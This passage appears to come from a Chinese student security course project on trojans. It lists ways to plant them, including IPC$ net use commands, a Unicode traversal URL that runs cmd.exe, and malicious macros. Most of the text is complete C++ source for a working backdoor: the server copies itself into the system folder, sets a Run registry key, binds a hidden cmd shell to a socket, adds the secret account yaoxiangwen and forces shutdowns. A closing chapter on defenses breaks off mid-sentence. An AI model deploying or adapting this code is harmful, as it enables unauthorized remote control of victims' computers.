打開139端口且有共享的可寫目錄.用法:直接將木馬放入即可.⑵通過IPC$要求:雙方均需打開IPC$且需要有對方的一個(gè)普通用戶的帳號(hào)(具有寫權(quán)限)用法:先用NET命令連上對方電腦netuse\\IP\IPC$"密碼"/user:用戶名再用COPY命令將木馬復(fù)制到對方電腦netcopy本地木馬路徑遠(yuǎn)程木馬路徑+木馬名字⑶通過網(wǎng)頁植入要求:對方IE需要是IE未打補(bǔ)丁版本用法1:利用IE的IFRAME漏洞入侵.用法2:利用IE的DEBUG代碼入侵.用法3:通過JS,VBS代碼入侵用法4:通過ActiveX或Java程序入侵.⑷通過OE入侵.要求:對方OE未打補(bǔ)丁.用法:與③中的用法1,3,4相同.⑸通過WORD/EXCEL/ACCESS入侵要求:對方未對宏的運(yùn)行做限制.用法1:編寫惡意的宏，夾雜木馬，運(yùn)行office文檔便植入主機(jī)中.用法2:通過OFFICE的幫助文件漏洞入侵.⑹通過Unicode漏洞入侵要求:對方有Unicode漏洞用法(舉例):_blank>http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?+COPY+本地木馬路徑+遠(yuǎn)程路徑+木馬名⑺通過FTP入侵要求:對方的FTP可以匿名登陸而且可寫入用法:直接將木馬傳上去即可.⑻通過TELNET入侵要求:具有對方的一個(gè)具有寫權(quán)限的賬號(hào)用法:用TELNET命令將木馬傳上去.⑼EXE合并木馬要求:無(但用于合并木馬的EXE文件體積應(yīng)該盡量小,而且應(yīng)該是比較熟悉的程序.)用法:用EXE文件合并器將兩個(gè)EXE合并即可.⑽winrar木馬入侵要求:對方安裝了Winrar用法:將壓縮包設(shè)置為自解壓格式,并設(shè)置自動(dòng)運(yùn)行的選項(xiàng)，再將RAR圖標(biāo)更改.⑾文件夾慣性點(diǎn)擊法要求:無用法:將一個(gè)木馬偽裝成文件夾的圖標(biāo)，再將其放于幾層目錄中.3.3木馬隱藏原理（1）木馬的啟動(dòng)隱藏方式①本地文件偽裝最常用的文件隱藏是將木馬病毒偽裝成本地文件。木馬病毒將可執(zhí)行文件偽裝成圖片或文本在程序中把圖標(biāo)改成WINDOWS的默認(rèn)圖片圖標(biāo)，再把文件名改為.JPG.EXE。由于WINDOWS默認(rèn)設(shè)置是不顯示已知的文件后綴名，文件將會(huì)顯示為.JPG，不注意的人點(diǎn)擊這個(gè)圖標(biāo)就在無意間啟動(dòng)了木馬程序。②通過修改系統(tǒng)配置來實(shí)現(xiàn)木馬的啟動(dòng)隱藏利用配置文件的特殊作用，木馬很容易就能在大家的計(jì)算機(jī)中運(yùn)行。像Autoexec.bat和Config.sys。特別是系統(tǒng)配置文件MSCONFIG.SY中的系統(tǒng)啟動(dòng)項(xiàng)system.ini，window.ini是眾多木馬的隱藏地。Windows安裝目錄下的system.ini的[boot]字段中，正常情況下為boot=“Explorer.exe”，如果后面有其他的程序，如這樣的內(nèi)容，boot=“Explorer.exefile.exe”，這里的file.exe，可能就是木馬服務(wù)端程序。另外，在System.ini中的[386enh]字段，要注意檢查在此段內(nèi)的driver=路徑\程序名。這里也有可能被木馬所利用。再有System.ini中的[drivers],[drivers32],[mci]這3個(gè)字段，也是起到加載驅(qū)動(dòng)程序的作用，因此也是增添木馬程序的好場所。（2）進(jìn)程隱藏進(jìn)程隱藏有兩種情況，一種隱藏是木馬程序的進(jìn)程仍然存在，只是不在進(jìn)程列表里；采用APIHOOK技術(shù)攔截有關(guān)系統(tǒng)函數(shù)的調(diào)用實(shí)現(xiàn)運(yùn)行時(shí)的隱藏，替換系統(tǒng)服務(wù)等方法導(dǎo)致無法發(fā)現(xiàn)木馬的運(yùn)行痕跡。另外一種方法是木馬不以一個(gè)進(jìn)程或者服務(wù)的方式工作。將木馬核心代碼以線程或DLL的方式插入到遠(yuǎn)程進(jìn)程中，由于遠(yuǎn)程進(jìn)程是合法的用戶程序，用戶又很難發(fā)現(xiàn)被插入的線程或DLL，從而達(dá)到木馬隱藏的目的。在Windows系統(tǒng)中常見的真隱藏方式有：注冊表DLL插入、特洛伊DLL、動(dòng)態(tài)嵌入技術(shù)、CreateProcess插入和調(diào)試程序插入等。3.4木馬通信原理如圖3.2所示，對于客戶端來說要與服務(wù)器端建立連接必須知道服務(wù)器端的端口IP地址，由于客戶端端口是人事先設(shè)定的，為己知項(xiàng)，所以最重要的是如何獲得服務(wù)器端的IP地址。獲得服務(wù)器端的IP地址的方法豐要有兩種：信息反饋和IP掃描。所謂信息反饋是指木馬成功安裝后會(huì)收集一些服務(wù)端的軟硬件信息，并通過E-MAIL,IRC或ICQ的方式告知控制端用戶。從這封郵件中可以知道服務(wù)端的IP等。另一種獲取IP的方法是IP掃描，通過IP掃描才能確定服務(wù)器端的IP地址。因?yàn)榉?wù)器端裝有木馬程序，所以它的木馬端口7080是處于開放狀態(tài)的，所以現(xiàn)在客戶端只要掃描IP地址段中8028端口開放的主機(jī)就行了，這個(gè)IP就會(huì)被添加到列表中。這時(shí)客戶端機(jī)就可以通過木馬的控制端程序向服務(wù)器端發(fā)出連接信號(hào)，服務(wù)器端中的木馬程序收到信號(hào)后立即做出響應(yīng)，當(dāng)客戶端收到響應(yīng)的信號(hào)后，開啟一個(gè)隨機(jī)端口2457與服務(wù)器端的木馬端口8028建立連接，到這時(shí)一個(gè)木馬連接才算真正建立。值得一提的要掃描整個(gè)IP地址段顯然費(fèi)時(shí)費(fèi)力，一般來說控制端都是先通過信息反饋獲得服務(wù)端的IP地址。木馬客戶端木馬客戶端木馬服務(wù)端(：2457)(：8028)圖3.2TCP/IP木馬通信原理信息安全專題設(shè)計(jì)與實(shí)踐第4章系統(tǒng)分析與設(shè)計(jì)

第4章系統(tǒng)分析與設(shè)計(jì)4.1整體設(shè)計(jì)本系統(tǒng)包含兩個(gè)獨(dú)立的應(yīng)用程序：客戶端程序和服務(wù)器端程序。使用C／S模型設(shè)計(jì)：客戶向服務(wù)器提出請求，服務(wù)器接收請求后，提出相關(guān)的服務(wù)。服務(wù)器程序通常在一個(gè)已經(jīng)設(shè)定的端口進(jìn)行監(jiān)聽，也就是說，服務(wù)進(jìn)程一直處于休眠狀態(tài)，直到一個(gè)客戶機(jī)程序提出了請求信息，此時(shí)，服務(wù)器程序被喚醒并且為客戶提供服務(wù)。以上過程的網(wǎng)絡(luò)通信是基于TCP／IP進(jìn)行的，在Windows網(wǎng)絡(luò)編程中，基本上所有的程序都是通過Socket進(jìn)行的。發(fā)送發(fā)送發(fā)送通過通過讀出保存寫入訪問指令客戶端網(wǎng)絡(luò)管理軟件網(wǎng)絡(luò)設(shè)備網(wǎng)絡(luò)管理軟件服務(wù)端指令網(wǎng)絡(luò)設(shè)備基于TCP/IP主機(jī)1主機(jī)2圖4.1系統(tǒng)功能模塊4.2系統(tǒng)功能、結(jié)構(gòu)設(shè)計(jì)，軟件流程圖4.2.1軟件的功能結(jié)構(gòu)圖如下圖4.2功能結(jié)構(gòu)圖4.2.2后門技術(shù)后門是一種可以繞過安全性控制而獲得對程序或系統(tǒng)訪問權(quán)的隱蔽程序或方法。利用來建立隱蔽通道，甚至植入隱蔽的惡意程序，達(dá)到非法訪問或竊取、篡改、偽造、破壞數(shù)據(jù)等目的?，F(xiàn)在后門多指系統(tǒng)被入侵后被安裝的具有控制系統(tǒng)權(quán)限的程序，通過它黑客可以遠(yuǎn)程控制系統(tǒng)。4.2.3總體流程本章木馬實(shí)例是通過C/S運(yùn)行模式并結(jié)合進(jìn)程與匿名管道技術(shù)來實(shí)現(xiàn)的，主體分為兩部分：即客戶端和服務(wù)端木馬程序。其原理為服務(wù)端程序在目標(biāo)計(jì)算機(jī)中采用自動(dòng)運(yùn)行模式，并打開2000端口進(jìn)行監(jiān)聽，當(dāng)客戶端向服務(wù)端主動(dòng)提出連接請求，服務(wù)端木馬程序就會(huì)自動(dòng)運(yùn)行，來應(yīng)答客戶端的請求，從而建立連接，服務(wù)段木馬程序根據(jù)客戶端的指令而執(zhí)行相應(yīng)的操作4.3程序清單及說明4.3.1程序清單Client.cpp//客戶端代碼Server.cpp//服務(wù)器端代碼4.3.2程序代碼及說明//Client.cpp文件#include<stdio.h>//包含標(biāo)準(zhǔn)輸入輸出庫#include<winsock.h>//包含windows套接字函數(shù)#include<iostream>usingnamespacestd;#pragmacomment(lib,"Ws2_32")//將注釋wsock32放置到lib文件中，否則需要加載#defineMAXSIZE2048 //每次可以接收的最大字節(jié)#defineSEND_PORT2000//與木馬程序連接的端口為2000structsockaddr_inClientAddr;//對方的地址端口信息SOCKETsock;//定義套接字變量,為全局變量DWORDstartSock()//建立套接字功能模塊{ WSADATAWSAData;//將WSAData的數(shù)據(jù)類型聲明為WSADATA if(WSAStartup(MAKEWORD(2,2),&WSAData)!=0) { //MAKEWORD(2,2)預(yù)定義Winsock版本，初始化套接字 printf("sockinitfail"); return(-1); } sock=socket(AF_INET,SOCK_STREAM,0); //連接對方 return1;}intmain(intargc,char*argv[]){ u_intnumbyte; charbuf[MAXSIZE];//傳送數(shù)據(jù)的緩沖區(qū) charip[100]; cout<<"請輸入要連接的IP地址"<<endl; cin>>ip; startSock();//調(diào)用建立套接字功能函數(shù) ClientAddr.sin_family=AF_INET; //協(xié)議類型是INET ClientAddr.sin_port=htons(SEND_PORT); //連接對方2000端口 ClientAddr.sin_addr.s_addr=inet_addr(ip); //連接對方的IP地址 connect(sock,(structsockaddr*)&ClientAddr,sizeof(structsockaddr)); printf("遠(yuǎn)程控制木馬程序菜單\r\n"); printf("add--建立Windows系統(tǒng)的秘密帳號(hào)\r\n"); printf("shutdown--關(guān)閉Windows計(jì)算機(jī)\r\n"); printf("reset--重新啟動(dòng)Windows計(jì)算機(jī)\r\n"); printf("close --關(guān)閉光驅(qū)\r\n"); printf("open --打開光驅(qū)\r\n"); printf("shell--建立cmd進(jìn)程\r\n"); printf("quit --退出系統(tǒng)\r\n"); printf("BITgaoping\r\n"); while(1) { buf[0]='\0'; scanf("%s",buf);//輸入控制指令 intiLen=strlen(buf); buf[iLen]=0xa; buf[iLen+1]='\0';//要求控制指令串最后為回車符,以示結(jié)束 numbyte=send(sock,buf,strlen(buf),0);//發(fā)出控制指令 if(numbyte==SOCKET_ERROR) { closesocket(sock); break; } numbyte=recv(sock,buf,MAXSIZE,0);//接收服務(wù)端發(fā)來的提示符 if(numbyte==SOCKET_ERROR) { closesocket(sock); break; } buf[numbyte]='\0'; printf("%s",buf);//顯示服務(wù)端發(fā)來的提示符 if(strcmp(buf,"quit")==0) { closesocket(sock); return0; } } return0;}//Server.cpp文件#include<winsock2.h>//包含windows套接字函數(shù)#include<stdio.h>//包含標(biāo)準(zhǔn)輸入輸出函數(shù)#include<mmsystem.h>//光驅(qū)控制函數(shù)mciSendString()所需的頭文件#include<iostream>//包含C++系統(tǒng)輸入輸出函數(shù)#include<string>//包含字符串處理函數(shù)usingnamespacestd;#include<winuser.h>//WinExec()函數(shù)所需的頭文件#pragmacomment(lib,"Ws2_32")//將注釋wsock32放置到lib文件中，否則需要加載#pragmacomment(lib,"Winmm.lib")//光驅(qū)控制函數(shù)mciSendString()所需的庫#defineRECV_PORT2000//木馬服務(wù)端對外響應(yīng)的端口#definePATH200//程序自啟動(dòng)的最大路徑SOCKETsock1,sock2;//sock1為服務(wù)端程序自身建立的套接字//sock2為服務(wù)端與客戶端建立響應(yīng)后的套接字intg1;charBuff[1024],cmd[1024];//緩沖區(qū)DWORDstartSock()//建立套接字功能模塊{ WSADATAWSAData;//將WSAData的數(shù)據(jù)類型聲明為WSADATA if(WSAStartup(MAKEWORD(2,2),&WSAData)!=0) { //MAKEWORD(2,2)預(yù)定義Winsock版本，初始化套接字 printf("sockinitfail"); return(-1); } sock1=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0); //建立套接字,為TCP/IP、流式格式 structsockaddr_inserverAddr;//保存套接字地址的結(jié)構(gòu)體 serverAddr.sin_family=AF_INET;//規(guī)定使用IPv4協(xié)議 serverAddr.sin_port=htons(RECV_PORT);//響應(yīng)端口 serverAddr.sin_addr.s_addr=ADDR_ANY; //建立IP地址,ADDR_ANY可使用任意IP地址連接 g1=bind(sock1,(sockaddr*)&serverAddr,sizeof(serverAddr)); //綁定端口與套接字 g1=listen(sock1,5);//等待監(jiān)聽，最大可接受5個(gè)連接請求 intserverAddrSize=sizeof(serverAddr); sock2=accept(sock1,(sockaddr*)&serverAddr,&serverAddrSize); //如果客戶請求2000端口，接受連接,并返回sock2套接字 return1;}intcmdshell(SOCKETsock)//建立cmd進(jìn)程功能模塊{ STARTUPINFOstartinfo;//控制進(jìn)程的主窗口的顯示方式 ZeroMemory(&startinfo,sizeof(startinfo)); startinfo.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; //決定本結(jié)構(gòu)的每一個(gè)成員是否起作用 startinfo.wShowWindow=SW_HIDE;//窗口顯示模式,隱藏格式 startinfo.hStdInput=startinfo.hStdOutput=startinfo.hStdError=(void*)sock; //標(biāo)準(zhǔn)輸入輸出管道 charcmdsystem[]="cmd";//cmd進(jìn)程 PROCESS_INFORMATIONProcessInformation;//指向進(jìn)程信息結(jié)構(gòu)的指針 intg2; //下面為建立進(jìn)程過程 g2=CreateProcess(NULL,cmdsystem,NULL,NULL,1,0,NULL,NULL,&startinfo,&ProcessInformation); //建立一個(gè)cmd.exe進(jìn)程與相應(yīng)的輸入輸出管道 WaitForSingleObject(ProcessInformation.hProcess,INFINITE);//等待子進(jìn)程退出 TerminateProcess(ProcessInformation.hProcess,0); //在一個(gè)子進(jìn)程中強(qiáng)制結(jié)束其他的進(jìn)程 CloseHandle(ProcessInformation.hProcess);//關(guān)閉子進(jìn)程句柄 return1;}DWORDstartExeFile()//自啟動(dòng)程序功能模塊{ charExeFile[PATH];//木馬程序緩沖區(qū) charTempPath[PATH];//系統(tǒng)目錄緩沖區(qū) intg3; GetModuleFileName(NULL,ExeFile,PATH);//得到當(dāng)前文件名 GetSystemDirectory(TempPath,PATH); //得到系統(tǒng)目錄 strcat(TempPath,"\\server.exe");//拷貝到系統(tǒng)文件夾名為server.exe g3=CopyFile(ExeFile,TempPath,FALSE); HKEYkey;//關(guān)鍵字句柄 if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0,KEY_ALL_ACCESS,&key)==ERROR_SUCCESS) {//創(chuàng)建和打開一個(gè)關(guān)鍵字 RegSetValueEx(key,"server",0,REG_SZ,(BYTE*)TempPath,lstrlen(TempPath)); //在RUN鍵下建立一個(gè)server鍵,為該木馬的路徑 RegCloseKey(key);//關(guān)閉并保存 } return1;}DWORDOpen_CDROM()//打開光驅(qū)程序功能模塊{ mciSendString("setcdaudiodooropen",NULL,0,NULL); //多媒體控制函數(shù) return1;}DWORDClose_CDROM()//關(guān)閉光驅(qū)程序功能模塊{mciSendString("Setcdaudiodoorclosedwait",NULL,1,NULL);//多媒體控制函數(shù)return1;}DWORDshutdownwin2k()//關(guān)閉Win2K程序功能模塊{ HANDLE hToken; TOKEN_PRIVILEGES tkp; //Windows2K中需要設(shè)置調(diào)用進(jìn)程的權(quán)限，當(dāng)獲取該權(quán)限后才能關(guān)閉計(jì)算機(jī)的操作 OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken); LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid); tkp.PrivilegeCount=1;//設(shè)置一個(gè)權(quán)限 tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(PTOKEN_PRIVILEGES)NULL,0); ExitWindowsEx(EWX_SHUTDOWN|EWX_FORCE,0); return1;}DWORDshutdownwin98()//關(guān)閉Win98程序功能模塊{ ExitWindowsEx(EWX_SHUTDOWN|EWX_FORCE,0); return1;}DWORDresetwin98()//重新啟動(dòng)Win98程序功能模塊{ ExitWindowsEx(EWX_REBOOT|EWX_FORCE,0); return1;}DWORDresetwin2k()//重新啟動(dòng)Win2K程序功能模塊{ HANDLE hToken; TOKEN_PRIVILEGES tkp; //Windows2K系列，需要設(shè)置調(diào)用進(jìn)程的權(quán)限，獲得權(quán)限才能進(jìn)行重新啟動(dòng)計(jì)算機(jī)的操作 OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken); LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid); tkp.PrivilegeCount=1;//設(shè)置一個(gè)權(quán)限 tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(PTOKEN_PRIVILEGES)NULL,0); ExitWindowsEx(EWX_REBOOT|EWX_FORCE,0); return1;}DWORDadduser()//建立秘密帳號(hào)程序功能模塊{ WinExec("netuseryaoxiangwen0123456789/add",SW_HIDE); //建立秘密帳號(hào):yaoxiangwen為用戶帳號(hào),0123456789為密碼 return1;}//下面為主函數(shù),通過調(diào)用各個(gè)功能模塊來實(shí)現(xiàn)木馬功能intmain(){ startExeFile();// startSock(); unsignedlongByteRead=0; while(1) { send(sock2,"遠(yuǎn)程控制系統(tǒng),請輸入你的選擇!\n\rcmd>",sizeof("歡迎進(jìn)入木馬遠(yuǎn)程控制系統(tǒng),請輸入你的選擇!\n\rcmd>"),0); ZeroMemory(cmd,1024);//初始化cmd[]緩沖區(qū),用來裝客戶端發(fā)來的指令 ByteRead=0;//接收客戶端發(fā)來的指令字節(jié)數(shù) while(ByteRead<200)//下面是接收客戶端發(fā)來控制字程序段 { if(recv(sock2,Buff,1,0)==SOCKET_ERROR)//控制字在Buff緩沖區(qū)中 { closesocket(sock2); return0; } cmd[ByteRead]=Buff[0]; if(Buff[0]==0xa||Buff[0]==0xd) {//如果控制字最后是回車符表示結(jié)束標(biāo)志,cmd[]數(shù)組最后一位為0 cmd[ByteRead]=0; break; } ByteRead++;//指令字節(jié)計(jì)數(shù) } if(strcmp(cmd,"open")==0) { Open_CDROM();//調(diào)用打開光驅(qū)模塊程序 send(sock2,"OK\n\rcmd>",sizeof("OK\n\rcmd>"),0); } elseif(strcmp(cmd,"close")==0) { Close_CDROM(); //調(diào)用關(guān)閉光驅(qū)模塊程序 send(sock2,"OK\n\rcmd>",sizeof("OK\n\rcmd>"),0); } elseif(strcmp(cmd,"shell")==0) { cmdshell(sock2);//調(diào)用CMD進(jìn)程模塊程序 send(sock2,"CreatethecmdShellOK\n\rcmd>",sizeof("CreatethecmdShellOK\n\rcmd>"),0); } elseif(strcmp(cmd,"shutdown98")==0) { shutdownwin98();//調(diào)用關(guān)閉Win98系統(tǒng)計(jì)算機(jī)模塊程序 send(sock2,"shutdownthewindows98OK\n\rcmd>",sizeof("shutdownthewindows98OK\n\rcmd>"),0); } elseif(strcmp(cmd,"shutdown")==0) { shutdownwin2k();//調(diào)用關(guān)閉Win2K系統(tǒng)計(jì)算機(jī)模塊程序 send(sock2,"shutdownthewindows2kOK\n\rcmd>",sizeof("shutdownthewindows2kOK\n\rcmd>"),0); } elseif(strcmp(cmd,"reset98")==0) { resetwin98();//調(diào)用啟動(dòng)Win98系統(tǒng)計(jì)算機(jī)模塊程序 send(sock2,"resetthewindows98OK\n\rcmd>",sizeof("resetthewindows98OK\n\rcmd>"),0); } elseif(strcmp(cmd,"reset")==0) { resetwin2k();//調(diào)用啟動(dòng)Win2K系統(tǒng)計(jì)算機(jī)模塊程序 send(sock2,"resetthewindows2kOK\n\rcmd>",sizeof("resetthewindows2kOK\n\rcmd>"),0); } elseif(strcmp(cmd,"add")==0) { adduser();//調(diào)用建立秘密帳號(hào)模塊程序 send(sock2,"netuseryaoxiangwen0123456789/addOK\n\rcmd>",sizeof("netuserxxdkgao/addOK\n\rcmd>"),0); } elseif(strcmp(cmd,"quit")==0) { //退出木馬，并關(guān)閉套接字 closesocket(sock2); exit(0); } else { send(sock2,"Badcommand,Pleaseinputthewordtryagain\n\rcmd>",sizeof("Badcommand,Pleaseinputthewordtryagain\n\rcmd>"),0); }//顯示輸入有誤,重新輸入 Sleep(10);//延時(shí) } return1;}4.4軟件流程圖如下圖4.3軟件流程圖

4.5實(shí)驗(yàn)結(jié)果及結(jié)論客戶端運(yùn)行后如下圖4.4所示：圖4.4運(yùn)行結(jié)果圖1、輸入“add”命令后，創(chuàng)建用戶成功服務(wù)器端提示命令成功，運(yùn)行結(jié)果如圖4.5所示圖4.5運(yùn)行結(jié)果圖用命令行查看用戶情況，運(yùn)行結(jié)果如圖4.6所示。圖4.6運(yùn)行結(jié)果圖用戶“yaoxiangwen”已經(jīng)成功創(chuàng)建2、輸入”shutdown”后，電腦自動(dòng)關(guān)閉成功3、輸入”reset”后，電腦自動(dòng)重啟4、輸入”close”后，光驅(qū)關(guān)閉5、輸入”open”后，光驅(qū)自動(dòng)打開6、輸入”shell”后，查看任務(wù)管理器如下圖Cmd命令行已經(jīng)被創(chuàng)建，運(yùn)行結(jié)果如圖4.7所示。圖4.7運(yùn)行結(jié)果圖7、輸入quit后，服務(wù)器端成功退出8、重啟系統(tǒng)后，服務(wù)器端成功自動(dòng)啟動(dòng)，說明軟件開機(jī)具有自啟動(dòng)功能。信息安全專題設(shè)計(jì)與實(shí)踐第5章木馬的防范措施

第5章木馬的防范措施鑒于木馬病毒的隱敝性和潛在的危險(xiǎn)性，我們必須提高警惕，從管理上、技術(shù)上來做好木馬病毒的防護(hù)。常見方法如下：（1）使用殺毒軟件用戶一般選擇在計(jì)算機(jī)上安裝專業(yè)殺毒軟件來防護(hù)、查殺病毒。如：瑞星、卡巴斯基、Mcafee等軟件。這些軟件都有一定的殺毒效果。還有一些專門用于木馬病毒的軟件如：木馬克星、木馬殺客等。但是我們也必須認(rèn)識(shí)到病毒的發(fā)展性，各種防病毒軟件的發(fā)展速度總是慢于病毒的發(fā)展速度，用戶必須經(jīng)常對殺毒軟件升新，更新殺毒軟件的病毒庫，使殺毒軟件具有很強(qiáng)的識(shí)“毒”功能。（2）手動(dòng)清除病毒通過對木馬病毒的分析和介紹，知道了木馬病毒的隱敝性和傳播特點(diǎn)，可以通過手動(dòng)方式來發(fā)現(xiàn)和清除木馬。1.查找木馬要使你的系統(tǒng)能顯示隱藏文件，因?yàn)橐恍┠抉R文件屬性是隱藏的。多數(shù)木馬都會(huì)把自身復(fù)制到系統(tǒng)目錄下并加入啟動(dòng)項(xiàng)(如果不復(fù)制到系統(tǒng)目錄下則很容易被發(fā)現(xiàn)，不加入啟動(dòng)項(xiàng)在重啟后木馬就不執(zhí)行了)，啟動(dòng)項(xiàng)一般都是加在注冊表中的，具體位置在：[6]HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion下所有以“run”開頭的鍵值;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion下所有以“run”開頭的鍵值;HKEY_USERS\Default\Software\Microsoft\Windows\CurrentVersion下所有以“Run”開頭的鍵值?？纯蠢锩嬗袥]有可疑或者不認(rèn)識(shí)的程序，那很可能是木馬！木馬亦可在Win.ini和System.ini的“run=”“、load=”“、shell=”后面加載，如果在這些選項(xiàng)后面加載程序是你不認(rèn)識(shí)的，就有可能是木馬。木馬最慣用的伎倆就是把“Ex